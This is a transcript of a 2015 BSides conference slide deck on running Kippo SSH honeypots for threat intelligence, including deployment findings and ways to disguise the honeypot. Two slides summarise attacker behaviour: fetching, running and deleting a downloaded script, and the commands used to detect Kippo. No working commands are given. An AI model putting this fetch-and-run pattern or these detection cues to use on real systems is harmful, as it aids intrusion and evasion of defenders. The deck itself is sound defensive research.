Honey Potz - BSides SLC 2015
-
Upload
chp1n -
Category
Technology
-
view
206 -
download
1
Transcript of Honey Potz - BSides SLC 2015
![Page 1: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/1.jpg)
Honey PotzETHAN DODGE (CHP1N)
![Page 2: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/2.jpg)
Disclaimer
The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.
Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.
![Page 3: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/3.jpg)
Audience
lNoobs.lDon't be afraid to ask questions!
lThose looking to get into the honey pot/threat intelligence communities.lThose that already have experience honey potting.
![Page 4: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/4.jpg)
Honey PotzBEWARE OF ADDICTION
![Page 5: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/5.jpg)
Why Honey Pots?
![Page 6: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/6.jpg)
Threat Intel?
![Page 7: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/7.jpg)
Threat Intel?
![Page 8: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/8.jpg)
Types of Honey PotsJUST A MORSEL OF HUNNY
![Page 9: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/9.jpg)
HoneyDrive
Bruteforce.gr
KippoDionaeaHoneydGlastopfConpotThug
Kippo-GraphHoneyd-VizDionaeaFRELK Stack
![Page 10: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/10.jpg)
Low Interaction vs. High Interaction
•Actual machine
•Complete functionality
•Can exploit whatever is
exploitable
•Used to observe targeted attacks
•Not easily detectable
•Bifrozt
•Simulation
•Incomplete functionality
•Cannot be used to exploit other
vulnerabilities
•Used to observe behavior
•Often easily detectable
•Kippo
![Page 11: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/11.jpg)
KippoTHE GOOD AND THE BAD
![Page 12: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/12.jpg)
“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”
https://github.com/desaster/kippo
![Page 13: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/13.jpg)
How Kippo Works
![Page 14: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/14.jpg)
How To Detecet Kippo
![Page 15: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/15.jpg)
How To Detecet Kippo
![Page 16: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/16.jpg)
Simple Ways To “Hide” It
•Change the hostname•Add a login banner•Edit userdb.txt•Change file system•Edit /etc/passwd & /etc/shadow•Edit script output
![Page 17: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/17.jpg)
Findings
![Page 18: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/18.jpg)
Login Attempts vs Successes in the past 30 days - LA
Total attempts: 519Total successes: 10
Total attempts: 3,924Total successes: 2
![Page 19: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/19.jpg)
Creds
•Default root/123456 (Top Graph)•Leaked 14 character password (Bottom Graph)
![Page 20: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/20.jpg)
“Leaking” Creds
•Leaked 14 character password to honeypot of pastebin•Posted at 1:14 AM MST•Any guesses as to how long it took until someone logged in?
![Page 21: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/21.jpg)
2 Hours 35 Minutes
•First login seen with correct password seen at 3:49 MST.•Romanian IP Address
•Malicious intent•Pastebin has over 100 views in 2 minutes (Bots)•Saw 5 logins from 3 distinct IP addresses in 12 hours
![Page 22: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/22.jpg)
Login Attempts vs Successes in the past 30 days - Canada
Total attempts: 255,059Total successes: 79
Total attempts: 282,263Total successes: 0
Hosting Problems
You get what you pay for.(Cloud At Cost)
![Page 23: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/23.jpg)
Changed userdb.txt
•Rejects most common 100 passwords from the most common 10 usernames (Top Graph)
•Therefore accepting multiple passwords•Accepts 7 character password from 5 different usernames
•Yet to be cracked •Leaked in a key logger dump this morning at 7:53 MST
![Page 24: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/24.jpg)
Changed fs.pickle
•Spun up an Ubuntu box serving DNS•Used createfs.py to create new fs.pickle•Yet to see better results
•I will blog about it
![Page 25: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/25.jpg)
Login Attempts vs Successes in the past 30 days - Europe
Total attempts: 429,661Total successes: 0
![Page 26: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/26.jpg)
Most attacked box
•In the heart of the EU•Doesn’t get attacked as much as Asian honeypots
•8 character password•Logon banner in Spanish
![Page 27: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/27.jpg)
Typical malicious session
•Wget/curl some script or executable•Chmod it•Execute it•Delete it•99% of the time is scripted
![Page 28: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/28.jpg)
Occasional you’ll get a lot more commands
![Page 29: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/29.jpg)
Typical Detection
•Runs ps –a, ifconfig, or cats a standard file•Sees default Kippo content•Hops out
![Page 30: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/30.jpg)
Kippo VisualizationTHE OLD AND THE NEW
![Page 31: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/31.jpg)
Kippo-Graph
![Page 32: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/32.jpg)
Kippo-Graph
![Page 33: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/33.jpg)
Kippo-Graph
![Page 34: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/34.jpg)
Tango Honeypot Intelligence
@Brian_Warehime
![Page 35: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/35.jpg)
Demo Time
![Page 36: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/36.jpg)
Downloads
•Original Kippo: https://github.com/desaster/kippo•Kippo fork I use: https://github.com/micheloosterhof/kippo
•Supports SFTP and json logging•Is updated regularly
•Download Tango: https://apps.splunk.com/app/2666/•Download Honeydrive: http://sourceforge.net/projects/honeydrive/
![Page 37: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/37.jpg)
Hosting Links
•Crissic – crissic.net ($10/year)lLA and Florida
•Cloud At Cost – cloudatcost.com ($35/life)lCanada
•Time4VPS – Time4VPS (€10/year)lEuropean Union
•Lowendstock.com•Lowendtalk.com
![Page 38: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/38.jpg)
@Andrew__Morris
@Brian_Warehime
@micheloosterhof
@da_667
@Threat_Inc
![Page 39: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/39.jpg)
Contact
Freenode: chp1nTwitter: @chp1nBlog: utzpin.org
![Page 40: Honey Potz - BSides SLC 2015](https://reader034.fdocuments.in/reader034/viewer/2022042716/55a69b471a28abef7d8b45db/html5/thumbnails/40.jpg)
el fin.